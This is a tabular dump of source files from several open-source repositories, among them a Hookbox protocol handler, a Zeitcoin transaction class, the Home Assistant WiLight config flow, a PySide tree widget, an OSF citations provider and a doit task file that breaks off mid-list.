code | repo_name | path | language | license | size
|---|---|---|---|---|---|
import logging
import uuid
import eventlet
from errors import ExpectedException
import rtjp_eventlet
class HookboxConn(object):
logger = logging.getLogger('HookboxConn')
def __init__(self, server, rtjp_conn, config, remote_addr):
self._rtjp_conn = rtjp_conn
self.server = server
self.state = 'initial'
self.cookies = None
self.cookie_string = None
self.cookie_id = None
self.cookie_identifier = config['cookie_identifier']
self.id = str(uuid.uuid4()).replace('-', '')
self.user = None
self.remote_addr = remote_addr
def serialize(self):
return {
"id": self.id,
"user": self.user and self.user.get_name(),
"cookie": self.cookie_string
}
def send_frame(self, *args, **kw):
try:
self._rtjp_conn.send_frame(*args, **kw).wait()
except Exception, e:
if 'closed' in str(e).lower():
pass
else:
self.logger.warn("Unexpected error: %s", e, exc_info=True)
def send_error(self, *args, **kw):
return self._rtjp_conn.send_error(*args, **kw)
def get_cookie(self):
return self.cookie_string
def get_id(self):
return self.id
def get_cookie_id(self):
return self.cookie_id
def get_remote_addr(self):
return self.remote_addr
def _close(self):
if self.state == 'connected':
self.server.closed(self)
def run(self):
while True:
try:
# print 'read a frame...'
self.logger.debug('%s waiting for a frame', self)
                fid, fname, fargs = self._rtjp_conn.recv_frame().wait()
# print 'got frame', fid, fname, fargs
except rtjp_eventlet.errors.ConnectionLost, e:
self.logger.debug('received connection lost error')
# print 'connection lost'
break
except:
# print 'some error..'
self.logger.warn("Error reading frame", exc_info=True)
continue
f = getattr(self, 'frame_' + fname, None)
if f:
try:
f(fid, fargs)
except ExpectedException, e:
self.send_error(fid, e)
except Exception, e:
self.logger.warn("Unexpected error: %s", e, exc_info=True)
self.send_error(fid, e)
else:
self._default_frame(fid, fname, fargs)
# print 'all DONE!'
# cleanup
self.logger.debug('loop done')
if self.user:
self.logger.debug('cleanup user')
# print 'go call remove connection'
self.user.remove_connection(self)
self.server.disconnect(self)
    def _default_frame(self, fid, fname, fargs):
        pass
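    # Frames are dispatched by name in run(): an incoming 'SUBSCRIBE' frame is
    # routed to frame_SUBSCRIBE via getattr, and unknown frame names fall back
    # to _default_frame above.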
def frame_CONNECT(self, fid, fargs):
if self.state != 'initial':
return self.send_error(fid, "Already logged in")
if 'cookie_string' not in fargs:
raise ExpectedException("Missing cookie_string")
self.cookie_string = fargs['cookie_string']
self.cookies = parse_cookies(fargs['cookie_string'])
self.cookie_id = self.cookies.get(self.cookie_identifier, None)
self.server.connect(self)
self.state = 'connected'
self.send_frame('CONNECTED', { 'name': self.user.get_name() })
def frame_SUBSCRIBE(self, fid, fargs):
if self.state != 'connected':
return self.send_error(fid, "Not connected")
if 'channel_name' not in fargs:
return self.send_error(fid, "channel_name required")
channel = self.server.get_channel(self, fargs['channel_name'])
channel.subscribe(self.user, conn=self)
def frame_UNSUBSCRIBE(self, fid, fargs):
if self.state != 'connected':
return self.send_error(fid, "Not connected")
if 'channel_name' not in fargs:
return self.send_error(fid, "channel_name required")
channel = self.server.get_channel(self, fargs['channel_name'])
channel.unsubscribe(self.user, conn=self)
def frame_PUBLISH(self, fid, fargs):
if self.state != 'connected':
return self.send_error(fid, "Not connected")
if 'channel_name' not in fargs:
return self.send_error(fid, "channel_name required")
channel = self.server.get_channel(self, fargs['channel_name'])
channel.publish(self.user, fargs.get('payload', 'null'), conn=self)
def frame_MESSAGE(self, fid, fargs):
if self.state != 'connected':
return self.send_error(fid, "Not connected")
if 'name' not in fargs:
return self.send_error(fid, "name required")
self.user.send_message(fargs['name'], fargs.get('payload', 'null'), conn=self)
def parse_cookies(cookieString):
output = {}
for m in cookieString.split('; '):
try:
k,v = m.split('=', 1)
output[k] = v
except:
continue
return output
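# Illustrative use of parse_cookies (values made up): a raw Cookie header such
# as 'session=abc123; theme=dark' yields {'session': 'abc123', 'theme': 'dark'}.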
| gameclosure/hookbox | hookbox/protocol.py | Python | mit | 5,241 |
#!/usr/bin/env python
#########################################
# Zeitcoin Transaction Class
#########################################
import sys
import hashlib
# Assumption: the Deferred/waitForDeferred usage below follows Twisted's API.
from twisted.internet import defer
from zeitcoindb import hashtable
from zeitcoinutility import utility, encyption
class transactions:
# Will handle transactions
# Transaction (format)
    # | Previous hash value (32 bytes) | length of sender script (4 bytes) | sender script | receiver address (32 bytes)
    # | length of receiver script (4 bytes) | receiver script | length of optional message (4 bytes) | message |
# Transaction Block Table:
# thash - hash of the transaction (32 byte hash)
# transactionscript - The whole formated transaction as listed above
# timestamp - the time the transaction was received
def __init__(self,filename,address,port):
self.filename = filename
self.address = address
self.port = port
def decodetransaction(self,thash):
previousthash=thash[:32]
hexlensender=thash[32:36]
lensender = int(hexlensender, 16)*2
senderscript=thash[36:36+lensender]
receiveraddress=thash[36+lensender:68+lensender]
hexlenreceiver=thash[68+lensender:72+lensender]
#print "hexlenreceiver = ", hexlenreceiver
lenreceiver=int(hexlenreceiver,16)*2
receiverscript=thash[72+lensender:72+lensender+lenreceiver]
hexlenmessage=thash[72+lensender+lenreceiver:76+lensender+lenreceiver]
lenmessage=int(hexlenmessage,16)*2
message=thash[76+lensender+lenreceiver:76+lensender+lenreceiver+lenmessage]
return previousthash,lensender,senderscript.decode("hex"), receiveraddress,lenreceiver,receiverscript.decode("hex"), lenmessage,message.decode("hex")
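    # Worked example of the offsets above (the 4-hex-char length fields count
    # bytes, and each byte is two hex chars, hence the *2): a 3-byte sender
    # script gives hexlensender == thash[32:36] == '0003', lensender == 6, so
    # senderscript spans thash[36:42] and receiveraddress spans thash[42:74].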
def formattransaction(self,previousthash,senderscript,receiverscript,receiveraddress,message):
lpreviousthash=len(previousthash)
if (lpreviousthash!=32):
print "[Error] - The previous thash is not a valid 32 byte hash"
lreceiveraddress=len(receiveraddress)
if (lreceiveraddress!=32):
print "[Error] - The receiver address is not a valid zietcoin address"
lensender=len(senderscript)
if (lensender>4294967296):
print "[Error] - The sender script is too long"
lenreceiver=len(receiverscript)
if (lenreceiver>4294967296):
print "[Error] - The receiver script is too long"
lenmessage=len(message)
if (lenmessage>4294967296):
print "[Error] - The message is too long"
lsender = self.formatint2hex(lensender,4)
lreceiver = self.formatint2hex(lenreceiver,4)
lmessage = self.formatint2hex(lenmessage,4)
hexsender=self.formatstr2hex(senderscript)
hexreceiver=self.formatstr2hex(receiverscript)
hexmessage=self.formatstr2hex(message)
print "lsender for tx = ",lsender
print "hexsender for tx = ",hexsender
print "address for tx = ",receiveraddress
print "lreceiver for tx = ",lreceiver
print "hexreceiver for tx = ",hexreceiver
print "lmessage for tx = ",lmessage
print "hexmessage for tx = ",hexmessage
transaction=str(previousthash)+str(lsender)+str(hexsender)+str(receiveraddress)+str(lreceiver)+str(hexreceiver)+str(lmessage)+str(hexmessage)
return transaction
def formatint2hex(self,int1,fill):
hex1=format(int(int1),'x')
hex1=hex1.zfill(fill)
return hex1
def formatstr2hex(self,str1):
hexstr=''
for c in str1:
int1=ord(c)
hex1 = self.formatint2hex(int1,2)
hexstr+=hex1
return hexstr
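    # Illustrative round trip (values made up): formatint2hex(255, 4) returns
    # '00ff' and formatstr2hex('ab') returns '6162' (ord('a') == 0x61,
    # ord('b') == 0x62), the two-hex-chars-per-byte layout that
    # decodetransaction reverses.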
def getreceivedcoins(self):
        # Go through the transaction block and find all coins owned by the wallet with a certain guid
# will return the number of coins that can be sent by the owner of the wallet
# probably will want to do this method in a thread as it might take a long time
ht=hashtable()
dbpool=ht.tconnectdb(self.filename)
d = defer.Deferred()
d.addCallback(ht.tgetalltb)
d.addCallback(ht.tgetallaccount)
d.addCallback(self._getreceivedcoins,ht,dbpool)
d.callback(dbpool)
return
def _getreceivedcoins(self,tblist,accountlist):
coinlist=[]
for tx in tblist:
previousthash,lensender,senderscript, receiveraddress,lenreceiver,receiverscript, lenmessage, message = self.decodetransaction(tx[1])
            for a in accountlist:
if (a[0]==receiveraddress):
list1=[]
list1.append(receiveraddress)
list1.append(a[3])
list1.append(tx[0])
coinlist.append(list1)
return coinlist
def getunspentcoins(self, coinlist,tblist):
        # Will go through the transaction block and find all the coins that can be spent by the wallet
        # Will return the thash of all the coins that are owned
# probably will want to do this method in a thread due to the time it might take
coinlist1=[]
for tx in tblist:
previousthash,lensender,senderscript, receiveraddress,lenreceiver,receiverscript, lenmessage, message = self.decodetransaction(tx[1])
flag=0
for c in coinlist:
if (c[2]==previousthash):
flag=1
if flag==0:
coinlist1.append(c)
return coinlist1
def getaddressofsender(self,thash,tblist):
# Will go through the transaction block and return the address of the sender of that thash (thread)
previousthash1,lensender,senderscript, receiveraddress,lenreceiver,receiverscript, lenmessage,message = self.decodetransaction(thash)
for tx in tblist:
            if (tx[0]==previousthash1):
                previousthash,lensender,senderscript, receiveraddress,lenreceiver,receiverscript, lenmessage,message = self.decodetransaction(tx[1])
                break
return receiveraddress
def getaddressofreceiver(self,thash):
# Will go through the transaction block and return the receiver address of a thash (thread)
previousthash1,lensender,senderscript, receiveraddress,lenreceiver,receiverscript, lenmessage,message = self.decodetransaction(thash)
return receiveraddress
def receivedtrans(self,coinhash,receiveraddress,message):
# received a new transaction from a person trying to send a coin
        # will call sendcoin after the client finishes the guided tour
return
def sendtrans(self):
# send a transaction to the network
return
    def sendcoin(self,coinhash,receiveraddress,message):
# send a coin to a certain address
# check to make sure this wallet owns this coin
# receiveraddress - first 32 bytes wallet guid | last 32 bytes will be the address that is stored in tb
# get the wallet guid and get its address and port
# zt=Zeit()
# zt=sendcoin(address,port,receiveraddress,coinhash,message)
return
def hashtransaction(self,tx):
        # hash a transaction (SHA-256 hex digest)
result=hashlib.sha256(tx).hexdigest()
return result
def checkvalidtx(self,receiveraddress,senderaddress,previoushash,txid,thash):
# Create local transaction list that holds: txid, thash, addresswallet,addressother, amount, timestamp
        # check if the sender is the valid owner of the coin
        # check to see if the previous hash exists
# Check to see if the transaction is valid over-all.
return
def checktransaction(self,inputtx,outputtx):
# check the input and output side of the transaction (returns true or false)
        result=False
zf=zietforth()
res1=zf.execute(inputtx)
res2=zf.execute(outputtx)
if (res1==True and res2==True):
result=True
return result
def broadcasttrans(self,txid,thash,ts):
# broadcast a valid transaction to all nodes
        # node that did the transaction will broadcast to everyone on its hash table.
        # everyone that receives this broadcast will rebroadcast to its farthest peer and its closest peer
ut=utility(self.filename,self.address,self.port)
ut.boardcasttrans(txid,thash,ts)
return
def acceptcoin(self,txid,thash,addresswallet,addressother,timestamp):
# store it in the local transaction table
# update balance txid,thash,addresswallet,addressother,amount,type1,time1
amount=1
type1="received"
        self.storetransaction(txid,thash,addresswallet,addressother,amount,type1,timestamp)
print "new coin was accepted with txid="+str(txid)+" thash="+thash+" ts="+str(timestamp)
return
def storetransaction(self,txid,thash,addresswallet,otheraddress,amount,type1,timestamp):
# store the transaction in the database
global FNAME
ht=hashtable()
#conn,c=ht.connectdb(FNAME)
dbpool=ht.tconnectdb(FNAME)
#ht=addtb(conn,c,txid,thash,time1)
wfd = defer.waitForDeferred(ht.taddtb(dbpool,txid,thash,timestamp))
yield wfd
        wfd = defer.waitForDeferred(ht.taddlt(dbpool,txid,thash,addresswallet,otheraddress,amount,type1,timestamp))
yield wfd #tgetnewbalance(self,dbpool)
wfd = defer.waitForDeferred(ht.tgetnewbalance(dbpool))
yield wfd
balance = wfd.getResult()
        wfd = defer.waitForDeferred(ht.tupdatebalance(dbpool,balance,guid))
yield wfd #tupdatebalance(self,dbpool,balance,guid)
ht.tclosedb(dbpool)
return
def main():
print "Testing the Transaction class"
sys.exit(0)
if __name__ == '__main__':
main()
#Generation of new coin:
#senderscript:
#push signcoinhash - sign the coinhash with the peer generating the key private key
#push publickey - public key from the peer generating the coin
#verifysign
#receiveraddress - guid of receiver:account address
#receiverscript:
#push coinhash - getguid
#push signcoinhash1 - sign with receiver of the coin public key
#decode signcoinhash1
#eq signcoinhash1 = decodecoinhash
#and 1 and 1
#verify
#push signcoinhash [signcoinhash]
#push publickey [signcoinhash, publickey]
#versign signcoinhash and pubkey [true]
#push coinhash [true,coinhash]
#push signcoinhash1 [true, coinhash, signcoinhash1]
#decode signcoinhash1 [true, coinhash, decodecoinhash]
#eq coinhash=decodecoinhash [true, true]
#and (1 and 1) [true]
#verify return true []
#============================================================================
#push coinhash [coinhash]
#push signcoinhash [coinhash, signcoinhash]
#decode signcoinhash [coinhash, decodecoinhash]
#eq coinhash = decodecoinhash [true]
#verify []
| mmgrant73/zeitcoin | zeitcointrans.py | Python | mit | 9,705 |
import pygame
import pygame.locals
from pygame.locals import *
if __name__ == "__main__":
# CODE MODIFICATION!
# We're down to just what we need at the moment.
pygame.init()
pygame.display.set_caption('Petri Dish')
pygame.quit()
| jeremyosborne/python | third_party/pygame/02_petri/petri.py | Python | mit | 274 |
# import pytest
# import pandas as pd
# import numpy as np
# import pkg_resources, os
# from io import StringIO
# from epic.scripts.overlaps.overlaps import (_compute_region_overlap,
# _create_overlap_matrix_regions)
# from epic.config.genomes import (create_genome_size_dict,
# get_effective_genome_length)
# __author__ = "Endre Bakken Stovner https://github.com/endrebak/"
# __license__ = "MIT"
# @pytest.fixture
# def region_matrixes(epic_overlap_intermediate_region_matrixes):
# return [pd.read_table(f, sep=" ", index_col=0) for f in epic_overlap_intermediate_region_matrixes]
# @pytest.fixture
# def expected_result_region_overlap():
# df = pd.read_table("examples/epic-overlaps/region_overlap_result.csv", sep=" ", index_col=0)
# return df
# @pytest.mark.current
# def test__compute_region_overlap(region_matrixes, expected_result_region_overlap):
# region_matrix = region_matrixes[0]
# df = _compute_region_overlap(region_matrix)
# print(df)
# # df.to_csv("examples/epic-overlaps/region_overlap_result.csv", sep=" ")
# # print(df)
# assert df.equals(expected_result_region_overlap)
# @pytest.fixture
# def expected_result_intermediate_region_matrix(epic_overlap_intermediate_region_matrixes):
# df = pd.read_table(epic_overlap_intermediate_region_matrixes[0], sep=" ", index_col=0)
# return df
| endrebak/epic | tests/scripts/test_overlaps.py | Python | mit | 1,447 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from streamcorpus import make_stream_item
from streamcorpus_pipeline._title import title
from streamcorpus_pipeline._clean_visible import clean_visible
def test_title():
stage = title({})
cv = clean_visible({})
si = make_stream_item(0, '')
si.body.clean_html = '''Then there
was a
<tag> ... <title>TITLE
HERE
</title>
'''
si = cv(si, {})
si = stage(si)
assert si.other_content['title'].clean_visible == 'TITLE HERE'
si = make_stream_item(0, '')
si.body.clean_html = '''Then there
was a
that went <tag> ... <title>TITLE
HERE%s
</title>
''' % ('*' * 80)
si = cv(si, {})
si = stage(si)
assert si.other_content['title'].clean_visible == 'TITLE HERE' + '*' * 50 + '...'
def test_title_unicode_clean_html():
# The trick is to make the 60th byte end at a non-character boundary.
# Use the snowman (3 byte encoding) and some foreign character (4 byte
# encoding). Since 7 does not divide 60, the 60th byte will be in the
# middle of an encoded codepoint.
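    # (Worked arithmetic: each 7-byte pair fills bytes 1-56 over eight pairs,
    # the ninth snowman fills bytes 57-59, so a 60-byte cut lands one byte
    # into the following 4-byte character.)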
foreign_snowmen = u'☃𠜎' * 100
stage = title({})
cv = clean_visible({})
si = make_stream_item(0, '')
si.body.clean_html = '<title>%s</title>' % foreign_snowmen.encode('utf-8')
si = cv(si, {})
si = stage(si)
got = si.other_content['title'].clean_visible.decode('utf-8')
assert len(foreign_snowmen[0:60]) + 3 == len(got)
assert foreign_snowmen[0:60] + '...' == got
def test_title_unicode_clean_visible():
# The trick is to make the 200th byte end at a non-character boundary.
# Use the snowman (3 byte encoding) and some foreign character (4 byte
# encoding). Since 7 does not divide 200, the 200th byte will be in the
# middle of an encoded codepoint.
foreign_snowmen = u'☃𠜎' * 100
stage = title({})
cv = clean_visible({})
si = make_stream_item(0, '')
si.body.clean_html = None
si.body.clean_visible = '%s' % foreign_snowmen.encode('utf-8')
si = stage(si)
got = si.other_content['title'].clean_visible.decode('utf-8')
assert len(foreign_snowmen[0:60]) + 3 == len(got)
assert foreign_snowmen[0:60] + '...' == got
| trec-kba/streamcorpus-pipeline | streamcorpus_pipeline/tests/test_title.py | Python | mit | 2,239 |
"""Config flow to configure WiLight."""
from urllib.parse import urlparse
import pywilight
from homeassistant.components import ssdp
from homeassistant.config_entries import ConfigFlow
from homeassistant.const import CONF_HOST
from . import DOMAIN
CONF_SERIAL_NUMBER = "serial_number"
CONF_MODEL_NAME = "model_name"
WILIGHT_MANUFACTURER = "All Automacao Ltda"
# List the components supported by this integration.
ALLOWED_WILIGHT_COMPONENTS = ["cover", "fan", "light"]
class WiLightFlowHandler(ConfigFlow, domain=DOMAIN):
"""Handle a WiLight config flow."""
VERSION = 1
def __init__(self):
"""Initialize the WiLight flow."""
self._host = None
self._serial_number = None
self._title = None
self._model_name = None
self._wilight_components = []
self._components_text = ""
def _wilight_update(self, host, serial_number, model_name):
self._host = host
self._serial_number = serial_number
self._title = f"WL{serial_number}"
self._model_name = model_name
self._wilight_components = pywilight.get_components_from_model(model_name)
self._components_text = ", ".join(self._wilight_components)
return self._components_text != ""
def _get_entry(self):
data = {
CONF_HOST: self._host,
CONF_SERIAL_NUMBER: self._serial_number,
CONF_MODEL_NAME: self._model_name,
}
return self.async_create_entry(title=self._title, data=data)
async def async_step_ssdp(self, discovery_info):
"""Handle a discovered WiLight."""
# Filter out basic information
if (
ssdp.ATTR_SSDP_LOCATION not in discovery_info
or ssdp.ATTR_UPNP_MANUFACTURER not in discovery_info
or ssdp.ATTR_UPNP_SERIAL not in discovery_info
or ssdp.ATTR_UPNP_MODEL_NAME not in discovery_info
or ssdp.ATTR_UPNP_MODEL_NUMBER not in discovery_info
):
return self.async_abort(reason="not_wilight_device")
# Filter out non-WiLight devices
if discovery_info[ssdp.ATTR_UPNP_MANUFACTURER] != WILIGHT_MANUFACTURER:
return self.async_abort(reason="not_wilight_device")
host = urlparse(discovery_info[ssdp.ATTR_SSDP_LOCATION]).hostname
serial_number = discovery_info[ssdp.ATTR_UPNP_SERIAL]
model_name = discovery_info[ssdp.ATTR_UPNP_MODEL_NAME]
if not self._wilight_update(host, serial_number, model_name):
return self.async_abort(reason="not_wilight_device")
# Check if all components of this WiLight are allowed in this version of the HA integration
component_ok = all(
wilight_component in ALLOWED_WILIGHT_COMPONENTS
for wilight_component in self._wilight_components
)
if not component_ok:
return self.async_abort(reason="not_supported_device")
await self.async_set_unique_id(self._serial_number)
self._abort_if_unique_id_configured(updates={CONF_HOST: self._host})
self.context["title_placeholders"] = {"name": self._title}
return await self.async_step_confirm()
async def async_step_confirm(self, user_input=None):
"""Handle user-confirmation of discovered WiLight."""
if user_input is not None:
return self._get_entry()
return self.async_show_form(
step_id="confirm",
description_placeholders={
"name": self._title,
"components": self._components_text,
},
errors={},
)
| aronsky/home-assistant | homeassistant/components/wilight/config_flow.py | Python | apache-2.0 | 3,621 |
# -*- coding: utf-8 -*-
from ofrestapi.users import Users
from ofrestapi.muc import Muc
from ofrestapi.system import System
from ofrestapi.groups import Groups
from ofrestapi.sessions import Sessions
from ofrestapi.messages import Messages
import pkg_resources
__version__ = pkg_resources.require("openfire-restapi")[0].version
| Adarnof/openfire-restapi | ofrestapi/__init__.py | Python | gpl-3.0 | 330 |
#-*- coding: utf-8 -*-
# wellswidget.py
# Copyright (c) 2011, see AUTHORS
# All rights reserved.
# This file is part of ProfileExtractor.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# Neither the name of the ProfileExtractor nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from PySide import QtCore, QtGui
from PySide.QtCore import *
from PySide.QtGui import *
from lib.table import *
class WellItem(QtGui.QTreeWidgetItem):
"""
"""
def __init__(self, label, color, parent = None):
"""
"""
super(WellItem, self).__init__(parent)
self.setText(0, label)
self.setCheckState(0, Qt.Unchecked)
if color:
brush = QBrush(QColor.fromRgbF(color[0], color[1], color[2]))
self.setForeground(0, brush)
def __eq__(self, item):
"""
"""
return self.text(0) == item.text(0)
class WellsWidget(QtGui.QTreeWidget):
"""
"""
refreshProfile = QtCore.Signal(list, list)
def __init__(self, parent = None):
"""
"""
super(WellsWidget, self).__init__(parent)
self.items = []
self.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.itemClicked.connect(self.selectItem)
self.itemDoubleClicked.connect(self.doubleClick)
self.setHeaderHidden(True)
self.nWells = 0
self.nControls = 0
self.objects = []
self.controls = []
self.toDisplay = []
self.controlWells = []
self.items = []
def load(self, table):
"""
"""
# Empty treeWidget
while self.topLevelItemCount() > 0:
self.takeTopLevelItem(0)
self.items = []
self.nWells = 0
self.nControls = 0
self.objects = []
self.controls = []
self.toDisplay = []
self.controlWells = []
self.table = table
self.fill()
def fill(self):
"""
        Fill tree widget with all wells from the table
"""
tree = {}
self.table.zipIter = False
i = 0
for l in self.table.lineHeaders:
l = l.split(" -- ")
exp = l[0]
date = l[1]
well = l[2]
if exp not in tree.keys():
tree[exp] = {}
if date not in tree[exp]:
tree[exp][date] = []
tree[exp][date].append((well, self.table.colors[i]))
i += 1
for exp in tree:
expItem = WellItem(exp, None, None)
self.addTopLevelItem(expItem)
for date in tree[exp]:
dateItem = WellItem(date, None, expItem)
self.addTopLevelItem(dateItem)
for well, color in tree[exp][date]:
label = well
wellItem = WellItem(label, color, dateItem)
self.addTopLevelItem(wellItem)
self.items.append(wellItem)
self.objects.append(wellItem)
self.sortItems(0, Qt.AscendingOrder)
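    # Illustrative input (assumed header format): a lineHeaders entry such as
    # 'exp1 -- 2011-05-02 -- A3' produces one experiment > date > well branch,
    # i.e. tree['exp1']['2011-05-02'] contains ('A3', color).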
def selectItem(self, item = None):
"""
"""
if item:
newState = item.checkState(0)
for i in range(item.childCount()):
child = item.child(i)
child.setCheckState(0, newState)
if child.childCount() != 0:
for j in range(child.childCount()):
child.child(j).setCheckState(0, newState)
tmp = []
for i in self.items:
if i.checkState(0) == Qt.Checked:
name = i.parent().parent().text(0) + ' -- '
name += i.parent().text(0) + ' -- '
name += i.text(0)
tmp.append(name)
controls = []
for item in self.controls:
name = item.parent().parent().text(0) + ' -- '
name += item.parent().text(0) + ' -- '
name += item.text(0)
controls.append(name)
if self.nWells != len(tmp) or self.nControls != len(controls):
#self.refreshProfile.emit(tmp, controls)
self.toDisplay = tmp
self.nWells = len(tmp)
self.nControls = len(controls)
self.controlWells = controls
def doubleClick(self, item, column):
"""
"""
if item in self.controls:
self.controls.remove(item)
font = QFont()
font.setWeight(QFont.Normal)
item.setFont(0, font)
else:
self.controls.append(item)
font = QFont()
font.setWeight(QFont.Bold)
item.setFont(0, font)
self.selectItem()
def itemSignal(self, name, mode = 'singleClick'):
"""
"""
for i in self.items:
itemName = i.parent().parent().text(0) + ' -- '
itemName += i.parent().text(0) + ' -- '
itemName += i.text(0)
if name == itemName:
if mode == 'singleClick':
i.setCheckState(0, Qt.Checked)
self.itemClicked.emit(i, 0)
elif mode == 'doubleClick':
self.itemDoubleClicked.emit(i, 0)
self.selectItem()
| hadim/profileextractor | src/ui/profiler/wellswidget.py | Python | bsd-3-clause | 6,684 |
import abc
import httplib as http
from framework.exceptions import HTTPError
from framework.exceptions import PermissionsError
from website.oauth.models import ExternalAccount
class CitationsProvider(object):
__metaclass__ = abc.ABCMeta
def __init__(self, provider_name):
self.provider_name = provider_name
@abc.abstractproperty
def serializer(self):
pass
def check_credentials(self, node_addon):
valid = True
if node_addon.api.account:
try:
node_addon.api.client
except HTTPError as err:
if err.code == 403:
valid = False
else:
raise err
return valid
def user_accounts(self, user):
""" Gets a list of the accounts authorized by 'user' """
return {
'accounts': [
self.serializer(
user_settings=user.get_addon(self.provider_name) if user else None
).serialize_account(each)
for each in user.external_accounts
if each.provider == self.provider_name
]
}
def set_config(self, node_addon, user, external_list_id, external_list_name, auth):
# Ensure request has all required information
node_addon.set_target_folder(external_list_id, external_list_name, auth)
def add_user_auth(self, node_addon, user, external_account_id):
external_account = ExternalAccount.load(external_account_id)
if external_account not in user.external_accounts:
raise HTTPError(http.FORBIDDEN)
try:
node_addon.set_auth(external_account, user)
except PermissionsError:
raise HTTPError(http.FORBIDDEN)
result = self.serializer(
node_settings=node_addon,
user_settings=user.get_addon(self.provider_name),
).serialized_node_settings
result['validCredentials'] = self.check_credentials(node_addon)
return {'result': result}
def remove_user_auth(self, node_addon, user):
node_addon.clear_auth()
node_addon.reload()
result = self.serializer(
node_settings=node_addon,
user_settings=user.get_addon(self.provider_name),
).serialized_node_settings
return {'result': result}
def widget(self, node_addon):
ret = node_addon.config.to_json()
ret.update({
'complete': node_addon.complete,
})
return ret
def _extract_folder(self, folder):
folder = self._folder_to_dict(folder)
ret = {
'name': folder['name'],
'provider_list_id': folder['list_id'],
'id': folder['id'],
}
if folder['parent_id']:
ret['parent_list_id'] = folder['parent_id']
return ret
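    # Illustrative mapping (assumed provider fields): a folder dict with
    # name='Papers', list_id='abc', id='1', parent_id=None becomes
    # {'name': 'Papers', 'provider_list_id': 'abc', 'id': '1'};
    # parent_list_id is added only when parent_id is truthy.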
@abc.abstractmethod
def _folder_to_dict(self, data):
pass
@abc.abstractmethod
    def _folder_id(self, node_addon):
return None
def citation_list(self, node_addon, user, list_id, show='all'):
attached_list_id = self._folder_id(node_addon)
account_folders = node_addon.api.citation_lists(self._extract_folder)
# Folders with 'parent_list_id'==None are children of 'All Documents'
for folder in account_folders:
if folder.get('parent_list_id') is None:
folder['parent_list_id'] = 'ROOT'
node_account = node_addon.external_account
user_accounts = [
account for account in user.external_accounts
if account.provider == self.provider_name
] if user else []
user_is_owner = node_account in user_accounts
# verify this list is the attached list or its descendant
if not user_is_owner and (list_id != attached_list_id and attached_list_id is not None):
folders = {
(each['provider_list_id'] or 'ROOT'): each
for each in account_folders
}
if list_id is None:
ancestor_id = 'ROOT'
else:
ancestor_id = folders[list_id].get('parent_list_id')
while ancestor_id != attached_list_id:
                if ancestor_id == '__':
raise HTTPError(http.FORBIDDEN)
ancestor_id = folders[ancestor_id].get('parent_list_id')
contents = []
if list_id is None:
contents = [node_addon.root_folder]
else:
user_settings = user.get_addon(self.provider_name) if user else None
if show in ('all', 'folders'):
contents += [
self.serializer(
node_settings=node_addon,
user_settings=user_settings,
).serialize_folder(each)
for each in account_folders
if each.get('parent_list_id') == list_id
]
if show in ('all', 'citations'):
contents += [
self.serializer(
node_settings=node_addon,
user_settings=user_settings,
).serialize_citation(each)
for each in node_addon.api.get_list(list_id)
]
return {
'contents': contents
}
| KAsante95/osf.io | website/addons/citations/provider.py | Python | apache-2.0 | 5,390 |
"""dodo file. test + management stuff"""
import glob
import os
import pytest
from doitpy.pyflakes import Pyflakes
from doitpy.coverage import Config, Coverage, PythonPackage
from doitpy import docs
from doitpy.package import Package
DOIT_CONFIG = {
'minversion': '0.24.0',
'default_tasks': ['pyflakes', 'ut'],
# 'backend': 'sqlite3',
}
CODE_FILES = glob.glob("doit/*.py")
TEST_FILES = glob.glob("tests/test_*.py")
TESTING_FILES = glob.glob("tests/*.py")
PY_FILES = CODE_FILES + TESTING_FILES
def task_pyflakes():
flaker = Pyflakes()
yield flaker('dodo.py')
yield flaker.tasks('doit/*.py')
yield flaker.tasks('tests/*.py')
def run_test(test):
return not bool(pytest.main([test]))
#return not bool(pytest.main("-v " + test))
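# Note: pytest.main returns an exit status (0 when every test passes), so
# run_test maps success to True, which doit treats as a successful action.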
def task_ut():
"""run unit-tests"""
for test in TEST_FILES:
yield {'name': test,
'actions': [(run_test, (test,))],
'file_dep': PY_FILES,
'verbosity': 0}
def task_coverage():
"""show coverage for all modules including tests"""
cov = Coverage([PythonPackage('doit', 'tests')],
config=Config(branch=False, parallel=True,
concurrency='multiprocessing',
omit=['tests/myecho.py', 'tests/sample_process.py'],)
)
yield cov.all()
yield cov.src()
yield cov.by_module()
############################ website
DOC_ROOT = 'doc/'
DOC_BUILD_PATH = DOC_ROOT + '_build/html/'
def task_rm_index():
"""remove/clean copied index.html if source changed"""
# work around https://github.com/sphinx-doc/sphinx/issues/1649
return {
'actions': ['cd doc && make clean'],
'file_dep': ['doc/index.html'],
}
def task_docs():
doc_files = glob.glob('doc/*.rst')
doc_files += ['README.rst', 'CONTRIBUTING.md',
'doc/open_collective.md']
yield docs.spell(doc_files, 'doc/dictionary.txt')
sphinx_opts = "-A include_analytics=1 -A include_donate=1"
yield docs.sphinx(DOC_ROOT, DOC_BUILD_PATH, sphinx_opts=sphinx_opts,
task_dep=['spell', 'rm_index'])
def task_samples_check():
"""check samples are at least runnuable without error"""
black_list = [
'longrunning.py', # long running doesn't terminate on its own
'settrace.py',
'download.py', # uses network
'taskresult.py', # uses mercurial
'tar.py', # uses mercurial
